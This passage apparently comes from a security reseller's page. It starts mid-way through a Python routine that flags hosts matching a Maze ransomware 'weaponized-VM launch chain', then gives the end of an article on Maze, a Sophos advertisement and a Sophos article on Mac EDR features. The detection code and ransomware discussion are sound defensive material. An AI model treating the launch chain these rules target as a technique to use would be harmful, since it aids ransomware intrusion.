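def match_rules(cmdline):
    """Names of every rule the command line triggers (possibly none)."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def assess_hosts(events):
    """Group rule hits per host and flag hosts showing the weaponized-VM launch chain."""
    per_host = {}
    for host, cmd in events:
        for name in match_rules(cmd):
            per_host.setdefault(host, []).append(name)
    return {
        host: {"hits": hits, "vm_chain": VM_CHAIN <= set(hits)}
        for host, hits in per_host.items()
    }

if __name__ == "__main__":
    for host, verdict in assess_hosts(SAMPLE_EVENTS).items():
        print(host, verdict)
```

Only ws01 is reported, with vm_chain set; ws02's ordinary `sc query` and local MSI install trigger nothing.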

The future of ransomware?

The Maze threat actors have proven to be adept at adopting the techniques demonstrated to be successful by other ransomware gangs, including the use of extortion as a means to extract payment from victims. As endpoint protection products improve their abilities to defend against ransomware, attackers are forced to expend greater effort to make an end-run around those protections.

Sophos endpoint products detect components of this attack as Troj/Ransom-GAV or Troj/Swrort-EG. Indicators of compromise can be found on the SophosLabs GitHub.

Net Universe offers all Sophos devices and subscriptions, as well as consulting services, with worldwide delivery.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/sophos.

Sophos Endpoint Detection and Response now available for Macs – Sophos News

SOPHOS AUDIO: Karl Ackerman, Principal Product Manager, discusses the Sophos EDR strategy.

For many organizations, Macs are a regular fixture in their IT estates. Whether they comprise just a few devices or a significant proportion, Macs need the same levels of cybersecurity protection and visibility as their Windows cousins.

That is why, in addition to proven protection from the latest Mac threats, Endpoint Detection and Response (EDR) is now available for Mac users as well as for Windows and Linux.

Intercept X Advanced with EDR gives both IT admins and cybersecurity experts the power to answer critical IT operations and threat hunting questions, and then remotely take any necessary actions.

Upgrade your IT security operations

Maintaining proper IT hygiene can be a significant time investment for IT admins. Being able to identify which devices need attention and what action needs to be taken can add another layer of complexity.

With Sophos EDR, you can now do just that – quickly and easily. For example:

  • Find devices with software vulnerabilities, unknown services running, or unauthorized browser extensions
  • Identify devices that have unwanted software
  • See if software has been deployed on devices, e.g. to make sure a rollout is complete
  • Remotely access devices to dig deeper and take action, such as installing software, editing configuration files, and rebooting a device

Hunt and neutralize threats

Tracking down subtle, evasive threats requires a tool capable of detecting even the smallest indicators of compromise.

With this release, Sophos EDR is significantly enhancing its threat hunting capabilities. For example:

  • Detect processes attempting to make a connection on non-standard ports
  • Get granular detail on unexpected script executions
  • Identify processes that have created files or modified configuration files
  • Remotely access a device to deploy additional forensic tools, terminate suspect processes, and run scripts or programs

Introducing Live Discover and Live Response

Two features make all of the examples above possible: Live Discover and Live Response.

Live Discover allows you to examine your data for almost any question you can think of by searching across Mac devices with SQL queries. You can choose from a selection of out-of-the-box queries, which can be fully customized to pull the exact information that you need, both when performing IT security operations hygiene and threat hunting tasks. Data is stored on-disk for up to 90 days, meaning query response times are fast and efficient.

Live Response is a command line interface that can remotely access devices in order to perform further investigation or take appropriate action. For example:

  • Rebooting a device pending updates
  • Terminating suspicious processes
  • Browsing the file system
  • Editing configuration files
  • Running scripts and programs

And it’s all done remotely, so it’s ideal in situations where you don’t have physical access to a device that needs attention.

Try the new features

Existing Intercept X Advanced with EDR customers will automatically see their Mac devices appearing for selection in Live Discover and Live Response by September 16.

Intercept X and Intercept X for Server customers that would like to try out EDR functionality can head to the Sophos Central console, select ‘Free Trials’ in the left-hand menu and choose the ‘Intercept X Advanced with EDR’ or ‘Intercept X Advanced for Server with EDR’ trial.

If you’re new to Sophos Central, start a no-obligation free trial of Intercept X Advanced with EDR today. You’ll get world class protection against the latest cybersecurity threats in addition to powerful EDR capabilities. Get started.

Live Discover and Live Response are available for Windows, Mac, and Linux devices.
